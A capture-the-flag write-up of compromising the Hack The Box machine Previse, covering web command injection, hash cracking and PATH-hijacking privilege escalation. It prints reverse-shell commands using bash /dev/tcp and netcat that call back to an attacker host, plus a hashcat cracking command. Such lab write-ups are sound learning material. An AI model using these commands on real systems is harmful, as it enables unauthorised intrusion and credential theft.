I have recently compromised the Previse machine on Hack The Box and decided to share my story on how I did it.
First of all, let’s scan our machine for open ports.
As we can see from the scan results, we have two open ports. One of them is port 80, so this is a classic web exploitation box.
Now, we need to run dirbuster to see available directories.
All of the pages redirected us to /login.php, except /nav.php.
We can try to intercept each page. The results from Repeater showed that we are able to visit the page but then we are immediately being redirected back to the login page.
The response of /accounts.php page is actually what we need. It is a page where we can register. Now we need to intercept the response manually to be able to use the page. We change 302 Found to 200 OK and forward the response.
Now we are able to register a new user.
After logging in, we can navigate through the pages. It turns out that we are able to upload and download files, and there is a sitebackup.zip file available on the page.
We are going to download and explore it.
After going through each file, we were able to find the exec() function in the logs.php file that will allow us to abuse it for code execution.
We can use the following command to create a reverse shell:
bash -i >& /dev/tcp/your-ip/your-port 0>&1
You can see more commands on how to get a reverse shell here.
We also need to open a listener on the port that we have specified in the command. After encoding our command and pasting the output in our request payload, we can replay the request that calls /bin/bash to get a reverse shell on the port.
Hooray! We were able to get access to the system. But, unfortunately, our permissions are limited.
During our exploration of the backup file, we found a config.php file where the credentials to the MySQL database are stored. So we can connect to the database and find the password hashes of the users.
As we can see from the image above, there are two users available. Let’s crack the password hash of m4lwhere. We can use hashcat.
It is recommended to run hashcat on the base machine as it uses the GPU which makes the cracking process much faster.
My base machine has Windows running on it so I am going to use the command below.
hashcat.exe -m 500 -a 0 hash.txt wordlists\rockyou.txt
As now we have the cracked password, we can use ssh to connect as the m4lwhere user.
We were able to extract the user flag. Now we need to escalate our privilege.
One of the common commands that are being used for escalating is sudo -l.
It showed sudo permission for /opt/scripts/access_backup.sh script. After analyzing the script, we can see that some binaries are called directly, and we can actually exploit this and get a reverse shell.
The m4lwhere user has write permissions in /tmp directory so we are going to use it for our exploitation. We have configured the environment variable $PATH for /tmp directory and created the date file containing a netcat command to return a reverse shell on port 4444.
echo “nc 10.10.17.216 4444 -c /bin/bash” > date
After running the /opt/scripts/access_backup.sh script, we received the reverse shell connection as root.